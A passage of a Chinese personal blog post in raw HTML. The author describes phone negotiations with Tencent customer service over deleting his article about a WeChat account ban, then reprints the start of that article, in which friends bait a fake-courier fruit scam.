然后妹子说花了半小时通读了一遍我的文章，然后介绍了一遍文章大体架构和情节，证明确实是做足了准备工作来的。当时我就有点乐了，北京海淀的一只蝴蝶扇动翅膀，彼岸的深圳南山就下起了一场雨，没想到💩文写的这么长连带着客服一起祸害😂，可见了解对手很下功夫。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">3. 其次就是一通正向的赞扬了，讲文章有逻辑、理解你号被封的悲愤、看你文章你也是个好人之类的，不展开赘述了。不知道是公司统一培训的还是妹子的个人能力，也不知道妹子那边是否有跟我文中一样的手写剧本，这种先赞同、表扬、欣赏的起手势确实是谈判当中非常重要且常用的技巧。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    说到客服体验很不好什么的，说要回去查一下然后再对客服进行培训xxx，我大概意思是我也非常理解你们，毕竟这么多用户，我不想看到谁被处罚，事情都过去了我也消气了。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">4. 此时我嗅到了一股熟悉的气息，就像我准备写超长💩文，我感觉根据她这前摇时间来看，这谈话是真要奔着40分钟去。所以我就直接问她所以你的诉求是什么？是让我删除文章么？</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    妹子施法被打断，阵脚修复只用了1.5秒，她说 “删文章只是我们的一个步骤嘛，先听我说完”，我内心OS：删文章都还只是其中一步，还有啥啊....</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">5. 赞扬完了基本就是转折了，概括性的说，例如 “你有没有想过xxx可能会造成xxxx”、“其实xxx是存在误会的”这种。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">6. 转折完了基本就是开始表达她的论点以及阐述她的论据了，几条下来说的很有条理，显然是U Bear Alive 有备而来。关于文章描述不实的，上面解释到的就不说了，我认为客观有道理的观点都表示理解，但是也有几个观点不认可，简单说说。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">. 客服妹子在微信上的微博客服给我发了截图，证明微博上确实联系我了，说客服联系我之后，我没有回复有效信息，过了一会发了个hello，然后就再没理会他们。</p><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p><img class="rich_pages wxw-img" data-ratio="1.0629629629629629" data-w="1080" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=0583e333&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1SmrAmBBlI62x2yuNJcKkNg8sLxaP4qicHld2evZahviauIxsgxapKOlrqbfX4zl8zdib3nibn90Upqg%2F640%3Fwx_fmt%3Dpng"/></p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我整一个大震惊，火速打开微博，发现在 “未关注人消息” 里面确实有客服的消息，但是只有后两条，而且这两条也是刚刚看到，封号事件之后基本就再没点击过这里。</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.5249597423510467" data-w="1242" data-type="jpeg" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba150e2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1SmrAmBBlI62x2yuNJcKkNQcOIR5GbibrJq3q95BUaK5SguG0mobsF3Uc6acEWbbMaQVTAyiaibHzKQ%2F640%3Fwx_fmt%3Djpeg"/></figure><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">比较败好感的是我截图了只有后两条的对话框她不太相信我的说法，可能怀疑我手动删除了单条消息什么的，她问我那你发的hello咋不见了（我发hello是当时没收到消息，试试看能不能调出来自动回复菜单之类的东西）。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我说可能是当时hello没有回应被我把会话左滑掉了，其次当时还没有跟真正的人工建立联系，有机会跟人工聊天我为啥要不回应呢？再就是下午七点半我都已经在电话里跟客服建立联系了，都已经绝望过了，还有啥理由再来微博这看呢（未关注人消息貌似提醒都不提醒）。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">可惜没当时没有刚好那个时间点的对话框截图，只找到一张18分没有收到消息的截图。不过信不信也无所谓了，微博真的吞消息也好，我自己眼睛不好没看见也罢，总之不是客服的锅，他们不至于做个图来哄我。</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="1.2648148148148148" data-w="1080" data-type="jpeg" src="https://wechat2rss.xlab.app/img-proxy/?k=4715c60c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1SmrAmBBlI62x2yuNJcKkN4qCSpbBuDF9w7WFYrmGiavT3fWg2HM20Kf79FuF7tcr57EAuCRGnR1g%2F640%3Fwx_fmt%3Djpeg"/></figure></section><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">8. 微博问题俩人辩论了半天没有结论，暂时搁置这个问题继续主线谈判进程，客服妹子说你被封号是因为你转发了没打码的东西，你想想你转发出去的东西还带有你们的成功案例，万一群里的人也想操作然后上当了咋整呢，这不跟你反诈的初衷背道而驰了么。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    实际上两个群一共9个人，6个是做安全的，六个人恨不得假冒菜鸟驿站那帮人也能打下来好让文章能再长点，另外三个也是IT从业，整天听我讲故事听的耳朵都起茧子了。就算是正面遭遇，一般人也骗不了他们....</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">9. 妹子说我看完之后觉得你这个写的过于专业了，你这个文章如果被骗子看到，会让他们学去的，这不跟你行侠仗义的初衷背离了么。我：emmm不用捧得这么高，那公安部网安局整天发反诈案例跟提醒，人家的剧本不比我的好。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    捧人这种手法比较常见，接受了对手给的高尚人设后就会被套在这个壳里，就不会做出与这个人设不符的事了，说白了有点道德绑架的意思。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">10. 妹子知道肉鸡，还暗示了违法犯罪相关，我说我被封号的那个群里就有那些单位的朋友，我肯定是确定自己不会被抓才发的文章。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">11. 除了XX大的客服、超话的名字，妹子还提到评论区有过激言论。我说这个没问题，但是评论的人也会收到牵连，我就把几个兄弟的评论隐藏掉了。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">12. 反正能拆招的拆招，这一通电话打了28分钟，最终我理解我们达成的协议是，公众号文章是可以修改的，我把她描述的几处 “不实信息” 那里的 “否” 都修改成 “是”。我表达的意思是修改我可以接受，删除文章不想删。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">13. 这通电话末尾我让她把在意的点、主要诉求，按照优先级排列（公众号能修改的字数有限，我想先帮她改最在乎的地方），总结一下以文字的形式发到我微信，我给你改。妹子迟疑了一下，说电话里说给我行不行，我说太多了我记不住啊，你放心我不会截图你发的内容再来抹黑你或者怎样。她说好的，等会发你。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    这里的反取证意识也是谈判当中相当重要的一个trick，避免对手拿到实质证据，另一方面也避免自己陷入恶意曲解的境地。</p><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="1.9005576208178439" data-w="1076" data-type="jpeg" src="https://wechat2rss.xlab.app/img-proxy/?k=8ffec00d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1SmrAmBBlI62x2yuNJcKkNFXZl4ylg5JDpPLeKrP61SX5rRjVKkPXEmVZ7Ne9ZBU0pGI4OOmngww%2F640%3Fwx_fmt%3Djpeg"/></figure></section><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">14. 一直没有等到她的消息，过了大概两个半小时，又打电话过来，问需要占用10到20分钟可以么，我直接惊呼出口 “为啥还需要这么久？”</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    这次她的态度完全变得强硬了，不知道是领导授意还是怎么，闭口不谈之前的优先级需求列表了，转而开始说文章标题也不满意、XX大的客服也不行，还是得删。我开始有点不耐烦了，心想差不多得了，按照我的经历换位思考，我没有任何夸大抹黑，已经答应让步了还想怎样。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    我说那不可能了，我只能接受修改文章，你不满意标题没办法，公众号文章不支持修改标题，除非你能联系公众号的人后台给我开个权限让我修改标题。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">15. 这第4通电话没打完，老大喊我上楼处理事情，我就先给挂了，跟她说等会再聊我得工作，挂电话时我问她几点下班，她说一直等到我有时间为止。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    整的我还贼不好意思，说白了我还愿意接着聊的原因在于，她也只是个打工人，我也不想太难为她，为了我这种垃圾case耽误周五下午下班时间太不值了，换作我是她，私下早就开骂了。</p><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="1.7453358208955223" data-w="1072" data-type="jpeg" src="https://wechat2rss.xlab.app/img-proxy/?k=7a690089&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1SmrAmBBlI62x2yuNJcKkNibV9gzD0iaau9Q0CE7gqATh54pYSzR6OcXUxVSBHUDoekQAzdhibFbCEw%2F640%3Fwx_fmt%3Djpeg"/></figure></section><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"><img class="rich_pages wxw-img" data-ratio="0.8989247311827957" data-w="930" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=35f4eb99&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1SmrAmBBlI62x2yuNJcKkN2aNiaD8MXf8ahV6JC1b8LO4YwaWrWUM2ZiagMWV9s8CGCFwA0Y8IbwVg%2F640%3Fwx_fmt%3Dpng"/><br/></figcaption></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>客服老哥<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">等我筋疲力尽的处理完事件回来，怕客服妹子等太久，毕竟已经几个小时了，没顾得上吃饭我就给客服微信号发消息了。没想到对面已然换人，换成了一个老哥。我心说彳亍，你们车轮战是吧，吃饭了的欺负没吃饭的。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><img class="rich_pages wxw-img" data-ratio="0.8633405639913232" data-w="922" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=ecea79bc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1SmrAmBBlI62x2yuNJcKkNklcecDh61OpvU5JR5fv2GtHgrRpOM204QbV2M3s9PAiaVdqwkGV3ibVg%2F640%3Fwx_fmt%3Dpng"/></p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">1. 老哥称自己是腾讯一个安全（脱敏）相关的项目经理，说把我写的东西也看了一遍<img style="display:inline-block;width:20px;vertical-align:middle;background-size:cover;" data-ratio="1" data-w="20" src="https://wechat2rss.xlab.app/img-proxy/?k=237274f1&amp;u=https%3A%2F%2Fres.wx.qq.com%2Ft%2Fwx_fed%2Fwe-emoji%2Fres%2Fv1.3.10%2Fassets%2Fnewemoji%2F2_05.png"/>。他的主要论点是：我非常理解你写的一切，但是站在你写的东西以后可能会被黑公关利用而吃到必胜客律师函的角度考虑，还是建议你删掉文章。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">2. 老哥一开口我能感受到一些的售前气息，鉴于以前在数字对销售的印象基本就是 “坑”，我习惯性的后撤三米听电话。周五的这个点工地上其实人已经不多了，我干脆打开外放听老哥说。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">3. 老哥提到自己是协调对接黑灰对抗这些项目的，跟我的工作比较接近，大家相互之间应该比较了解。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    寻找共鸣点，拉近彼此关系。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">4. 老哥提到有些人在微博也是发一些主观的感受，但是由于违背事实，被黑公关利用后，腾讯公关打官司的时候被牵连，我们应该认识到这个风险。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    这个风险老哥说了好几遍，我问老哥感觉您话里话外是不就是在暗示，如果我再油盐不进就南山必胜客伺候了，老哥说那肯定不是（跟让客服妹子整理文字版发我一样，我不知道他们是不是怕被我抓到什么搞事hhhh）。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    举例说明，晓之以理，暗示。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">5. 老哥说非常理解你写了那么长那么久，还花时间跟小学生斗智斗勇，辛苦写出来发出来展示给亲戚朋友看，让大家看到跟骗子斡旋（他是想表达我这么干很有面儿，有自豪感），现在都已经第二天了，涨粉涨流量也都差不多了，是不是可以删掉了。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">     我说你看我一年写一篇，也没开广告打赏啥的，是在乎流量嘛？写这个也就图一乐，不想删只是感觉自己没做错什么。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">6. 老哥说客服妹子特意去联系了公众号的人，说文章标题改不了，内容也只能修改20个字符，客服妹子想让你修改的东西20个字符肯定是不够的。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    我说那你们有点得寸进尺了啊，一开始商量好的改文字，后来又这也不满意那也不满意。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">7. 老哥基本就是那一个风险+之前客服妹子的笔录来回磨，还提到如果我是在乎浏览量之类的，可以在我删除掉客服部分重发之后，帮我多转载几个群......</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">    我就这么没吃晚饭听他磨了二十分钟，我说彳亍，我可以删。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.625" data-w="648" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=6e62662f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1SmrAmBBlI62x2yuNJcKkNwSiaCeX4Fy0U98oaQvWgIUBUQOJsrS5ze5IHhJhPRJ2FEejzCa7lJfA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">那就辛苦金哥跟快手哥陪我再演一遭。<br/></p></section><section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding: 0 10px;line-height: 1.6;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;word-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#39;PingFang SC&#39;, Cambria, Cochin, Georgia, Times, &#39;Times New Roman&#39;, serif;"><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">以下是原文的修改版，看过的就不用看啦。</p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><section><qqmusic class="js_editor_qqmusic qqmusic_iframe js_uneditable custom_select_card" musicid="243978927" mid="003lWcXv0fsBj2" albumurl="https://y.gtimg.cn/music/photo_new/T002R68x68M0000049shen4F74vJ.jpg" audiourl="http://isure6.stream.qqmusic.qq.com/C200000k0LnD1jobfM.m4a?guid=2000000052&amp;vkey=9ACDFCAE3D6DF1879620575214A98122DF8F5BD9809CC155D2EADC215301047201F5F7BD3B9E9594C6C2948A9505A85B5F5BB5B20ACE953F&amp;uin=0&amp;fromtag=20052" music_name="假如生活欺骗了你" singer="新裤子 - 两只老虎 电影原声大碟" play_length="232" src="/mp/readtemplate?t=app_editor/music&amp;singer=%E6%96%B0%E8%A3%A4%E5%AD%90%20-%20%E4%B8%A4%E5%8F%AA%E8%80%81%E8%99%8E%20%E7%94%B5%E5%BD%B1%E5%8E%9F%E5%A3%B0%E5%A4%A7%E7%A2%9F&amp;music_name=%E5%81%87%E5%A6%82%E7%94%9F%E6%B4%BB%E6%AC%BA%E9%AA%97%E4%BA%86%E4%BD%A0&amp;albumurl=https%3A%2F%2Fy.gtimg.cn%2Fmusic%2Fphoto_new%2FT002R68x68M0000049shen4F74vJ.jpg&amp;musictype=1" musictype="1" otherid="003lWcXv0fsBj2" albumid="0049shen4F74vJ" jumpurlkey="" data-pluginname="insertaudio"></qqmusic></section><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;">TL;DR<br/></h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">因善意提醒朋友小心诈骗，我的微信账号意外被封。在小红书学到可以去微博 “腾讯客服” 超话发帖的姿势，本想以这种方式来与腾讯人工客服取得联系，不料却遇到两拨打着 “付费解封” 幌子骗钱的骗子，其中一位名号为 “金牌黑客”，本文记录的就是整个故事的前因后果，我与两位高人交流的过程。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>第一波骗子 - 水果侠</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">这冗长的故事要从第一波骗子说起。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>缘起菜茑驿站<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">2023年1月31日早上9点52分，我像往常一样还没下通往工地的地铁，yuxge在群里发了一张短信的截图，短信内容看上去是假冒菜鸟驿站，以送电饭煲的名义诱导用户与骗子建立联系的剧本。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8045540796963947" data-s="300,640" style="" data-type="png" data-w="1054" src="https://wechat2rss.xlab.app/img-proxy/?k=f0c47892&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnjvibbKTfuicZM5BQMe8XFRGZ2Dx0hZLUNnZccTkJ8ensc2btdl0fofLg%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">1<br/></figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">yuxge问这是什么套路，因为之前有了解过一些“低成本商品高价到付”来骗人的故事，我就回答说是不是到付的套路啊。不过顺手小红书搜了下，发现有人发帖说有类似做任务返佣之类的情节设计在里面，我把帖子往群里转发了一下，yuxge说感觉跟帖子中描述的不一样，我说那你验证下试试呢。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.68984375" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=5d90e140&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnQwhCsyQNibXkQyOWheicHoV56xic8qJtIcCSzId8xe78vyj5xV3Ctd6JA%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">2<br/></figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">后来yuxge真的用支付宝加了骗子，骗子说可以送他一份水果，我马上get到这可能是先给用户一点甜头（比如红包发个十块五块）那种，让他地址写公司（比较模糊的园区地址）发给骗子试试。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.0890625" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=2d8d5dd4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnhiag5nricTpBhic5iaabaFcvcBadm6mpFArgChmyjpxQN3FaphBNNNtgnQ%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">3<br/></figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">yuxge还有尝试举报对方，但是没有成功，我理解应该是缺少实质性的证据。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.9136029411764706" data-s="300,640" style="" data-type="png" data-w="1088" src="https://wechat2rss.xlab.app/img-proxy/?k=8d3a5c80&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnR62HCYtiaDrt7871WCgfricJrF39PW5lc4TricIyAw39spsR4WyO5fh1Q%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">4<br/></figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">时间来到了午饭后，yuxge被拉到了一个支付宝群，管理员在里面发了一个软件的下载地址，我们点进去看了下，竟然也为iPhone做了客户端（要信任描述文件），iPhone手机信任描述文件这个操作有些危险，我就劝他这个就别试了，估计群里发言的都是自导自演的托。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.65" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=7a98fbad&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnr3Txzo3JWUlN5ShrkDk2BWQL05cToqUldVfImnv0MZB0HqubzvCic2Q%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">5<br/></figcaption></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>竟然来真的<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">2023年1月31日中午12点38分，骗子真的给yuxge买来了水果，虽然知道是骗子在附近的商家下的单，但是为了避免跟骗子本人接触的可能性，yuxge机智的让外卖小哥把水果放到了快递柜里。外卖小哥走了几分钟后，yuxge才去取水果，担心被猫在一边的骗子噶腰子，他还仔细观察了一下外卖柜附近的人。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">不过yuxge跟骗子那儿点的山竹和草莓，可能由于单人投资预算有限，骗子给他买的是草莓和苹果，加起来58块。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.79765625" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=9629b3c5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnTFvLQzvXeLasxbzVvxY1HfvRNBJCj9y2p508PB0v5f6yI6mneAHXgA%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">6</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">此时群里被带起来了一波小高潮，群友们骚动了起来。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.53359375" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=ab7cc9be&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnGNEBcteJVlUAxcqxwal2IxacjWajnOTibLRH2ZR1paZyd9sCHgHGMAw%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">7</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">职业的原因，平时遇到诈骗相关的故事喜欢转发给亲近的朋友当警示案例，连科普带装B。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我觉得这波薅到骗子水果的操作还挺有意思，就把从早上yuxge发言到中午我啃到苹果的聊天记录和并转发到了两个群里，一个是有4个人的舍友的群，一个是有6个人的同事的群。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.42890625" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=396546f6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnUhmY7Vb43ee75iaWnmVBPqctyTziaq8ak0UMkNKw6dvqHOibbQHRgRrEQ%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">8</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">毕竟这是让骗子花钱买水果给你吃，夺牛逼啊，谁不想薅到骗子花钱买的水果呢？</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5625" data-s="300,640" style="" data-type="png" data-w="320" 